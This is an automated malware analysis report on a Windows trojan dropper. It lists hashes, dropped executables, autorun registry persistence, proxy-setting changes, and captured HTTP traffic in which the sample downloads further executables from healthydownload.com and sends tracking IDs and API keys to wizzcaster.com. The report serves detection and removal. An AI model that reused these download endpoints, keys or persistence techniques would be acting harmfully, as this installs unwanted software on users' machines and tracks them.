Gen.Variant.Barys.55356_f1ec03d5a4
HEUR:Trojan.Win32.Generic (Kaspersky), Gen:Variant.Barys.55356 (B) (Emsisoft), Gen:Variant.Barys.55356 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
MD5: f1ec03d5a422b1abb0b75d78a1c994fb
SHA1: 69fb4d5ba39a7a804728fa52b52a8e5d36491d0f
SHA256: 3a10ecdbf853d29fe26438917d92f4f4502ff8a6dee9021fafbc83dfade3a58d
SSDeep: 49152:6mbprTcg3cSkNP5eQEudg8LfpZI/HXnm:
Size: 2464768 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: MicrosoftVisualC, NETexecutable, UPolyXv05_v6
Company: no certificate found
Created at: 2017-04-24 08:53:18
Analyzed on: Windows7 SP1 32-bit
Summary:
Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
0c8sG5Y9ZDReGyR0kr6B.exe:2924
pops.exe:1672
HaveFun.exe:3352
The Trojan injects its code into the following process(es):
0c8sG5Y9ZD.exe:1992
0c8sG5Y9ZDReGyR0kr6B.exe:3036
%original file name%.exe:2712
677753.exe:3556
Mutexes
The following mutexes were created/opened:
No objects were found.
File activity
The process 0c8sG5Y9ZD.exe:1992 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
The process 0c8sG5Y9ZDReGyR0kr6B.exe:3036 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe (237130 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe (400 bytes)
The process pops.exe:1672 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe (204 bytes)
The process %original file name%.exe:2712 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe (65224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe (26099 bytes)
Registry activity
The process 0c8sG5Y9ZD.exe:1992 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"EnableFileTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"MaxFileSize" = "1048576"
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZD_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5XTP8SOZXJ5K2MD" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe"
The process 0c8sG5Y9ZDReGyR0kr6B.exe:3036 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"EnableFileTracing" = "0"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\0c8sG5Y9ZDReGyR0kr6B_RASMANCS]
"EnableFileTracing" = "0"
"FileTracingMask" = "4294901760"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_AKR6B" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process 0c8sG5Y9ZDReGyR0kr6B.exe:2924 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process pops.exe:1672 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASMANCS]
"FileTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASMANCS]
"EnableFileTracing" = "0"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASAPI32]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASMANCS]
"FileDirectory" = "%windir%\tracing"
"EnableConsoleTracing" = "0"
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\pops_RASAPI32]
"MaxFileSize" = "1048576"
"FileDirectory" = "%windir%\tracing"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process %original file name%.exe:2712 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\CasterDate]
"date" = "30/04/2017"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"EnableConsoleTracing" = "0"
"FileDirectory" = "%windir%\tracing"
"MaxFileSize" = "1048576"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "0"
[HKCU\Software\Microsoft\wewewe]
"partner" = "tuto"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKCU\Software\Microsoft\wewewe]
"Product" = "diskpower"
"channel" = "1"
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"EnableConsoleTracing" = "0"
"FileTracingMask" = "4294901760"
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"FileTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASMANCS]
"ConsoleTracingMask" = "4294901760"
[HKLM\SOFTWARE\Microsoft\Tracing\f1ec03d5a422b1abb0b75d78a1c994fb_RASAPI32]
"EnableFileTracing" = "0"
The Trojan deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass"
"IntranetName"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName"
The process HaveFun.exe:3352 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"ConsoleTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"ConsoleTracingMask" = "4294901760"
[HKCU\Software\Classes\Local Settings\MuiCache\2D\52C64B7E]
"LanguageList" = "en-US, en"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"MaxFileSize" = "1048576"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"FileDirectory" = "%windir%\tracing"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"FileTracingMask" = "4294901760"
"EnableFileTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASAPI32]
"EnableConsoleTracing" = "0"
[HKLM\SOFTWARE\Microsoft\Tracing\HaveFun_RASMANCS]
"FileTracingMask" = "4294901760"
The process 677753.exe:3556 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"602883" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe"
Dropped PE files
| MD5 | File path |
|---|---|
| a3bccd7e94fffff0645143491a4e12b0 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe |
| 324e5d2a28c74423fd2543f1fb07eed8 | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe |
| cd9f1c13bdb1312986a298a52a732c2b | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe |
| 2c0e45bd928cd5990b8a61611d82255d | c:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe |
| dbd4830abcacb1a4674b0bfcbc536632 | c:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
VersionInfo
Company Name: B
Product Name: B6BCT
Product Version: 0.8.2.1
Legal Copyright: Copyright (c) 9682
Legal Trademarks:
Original Filename: Shooting.exe
Internal Name: Shooting.exe
File Version: 0.8.2.1
File Description:
Comments: B6BCT88FN
Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 8192 | 2450728 | 2450944 | 4.16653 | 230d155d1a876142f76b515cdeb5b9f6 |
| .rsrc | 2465792 | 12336 | 12800 | 3.07361 | 303f403ca50cc818039742fd90d3030d |
| .reloc | 2482176 | 12 | 512 | 0.070639 | ae09f4ca7437d464fa94dbe0c0729317 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
URLs
| URL | IP |
|---|---|
| hxxp://healthydownload.com/get/4/remote.exe | |
| hxxp://healthydownload.com/get/3/wizzcaster_v2.exe | |
| hxxp://wizzcaster.com/remotes_xml_sections.php | |
| hxxp://healthydownload.com/from_backup/AdsShow_installer.exe | |
| hxxp://wizzcaster.com/api/v5/config | |
| hxxp://healthydownload.com/get/4/updater.exe | |
| hxxp://wizzcaster.com/api/v5/link | |
| hxxp://healthydownload.com/safe_download/AdsShow.exe | |
| hxxp://wizzcaster.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load | |
| hxxp://www.wizzmonetize.com/remotes_xml_sections.php | |
| hxxp://agent.wizztrakys.com/wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
ET POLICY PE EXE or DLL Windows file download HTTP
Traffic
POST /wemonetize/wizzmonetize/sales_we_diskpower_tuto_1_load HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: agent.wizztrakys.com
Content-Length: 44
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
api_key=fa02609b-2368-11e6-922f-0cc47a47968c
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:07 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=k5ikgkh8hqgmul6g2rj09i65p4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 29
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"message":"Track was added"}
POST /remotes_xml_sections.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: VVV.wizzmonetize.com
Content-Length: 154
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
remote_id=1&user_name=wemonetize&api_key=e721cfcc-2148-11e6-922f-0cc47a47968c&buying_product_name=diskpower&buying_partner_name=tuto&buying_channel_name=1
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:00 GMT
Server: Apache/2.4.10 (Debian)
Set-Cookie: PHPSESSID=r4l986j0gch36ju0v6bd81s7l6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1076
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /safe_download/AdsShow.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:06 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /get/3/wizzcaster_v2.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:31:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="wizzcaster_v2.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /get/4/remote.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:31:58 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="remote.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /from_backup/AdsShow_installer.exe HTTP/1.1
Host: healthydownload.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="AdsShow_installer.exe"
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
GET /get/4/updater.exe HTTP/1.1
Host: healthydownload.com
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:03 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
content-disposition: attachment; filename="updater.exe"
Transfer-Encoding: chunked
Content-Type: application/x-msdownload
POST /api/v5/config HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 38
Expect: 100-continue
Connection: Keep-Alive
HTTP/1.1 100 Continue
uid=57a764d042bf8&days_after_install=0
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:02 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=28c8805ce4ed988b894068b634a23363093ba9e6; expires=Sun, 30-Apr-2017 20:32:02 GMT; Max-Age=7200; path=/; httponly
Content-Length: 28
Keep-Alive: timeout=10, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
{"time_between_prints":"15"}
POST /api/v5/link HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: wizzcaster.com
Content-Length: 17
Expect: 100-continue
HTTP/1.1 100 Continue
uid=57a764d042bf8
HTTP/1.1 200 OK
Date: Sun, 30 Apr 2017 18:32:03 GMT
Server: Apache/2.4.10 (Debian)
Cache-Control: no-cache
Set-Cookie: laravel_session=acab1b7ffe2fa9eb1b4ba290e7e4bd4ae64103c4; expires=Sun, 30-Apr-2017 20:32:03 GMT; Max-Age=7200; path=/; httponly
Content-Length: 62
Content-Type: text/html; charset=UTF-8
{"link":"http:\/\/bigpicturepop.com\/redirect\/57a764d042bf8"}
The Trojan connects to the servers at the following location(s):
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
0c8sG5Y9ZDReGyR0kr6B.exe:2924
pops.exe:1672
HaveFun.exe:3352
- Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\cast.config (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\HaveFun.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\config.conf (32 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\GPCKEC9RLQ\pops.exe.config.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe.config (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe (65224 bytes)
C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe (26099 bytes)
- Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"5XTP8SOZXJ5K2MD" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZD.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"OMEWPRODUCT_AKR6B" = "C:\Users\"%CurrentUserName%"\AppData\Local\Temp\0c8sG5Y9ZDReGyR0kr6B.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"602883" = "C:\Users\"%CurrentUserName%"\AppData\Roaming\808896\677753.exe"
- Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Reboot the computer.
*Manual removal may cause unexpected system behaviour and should be performed at your own risk.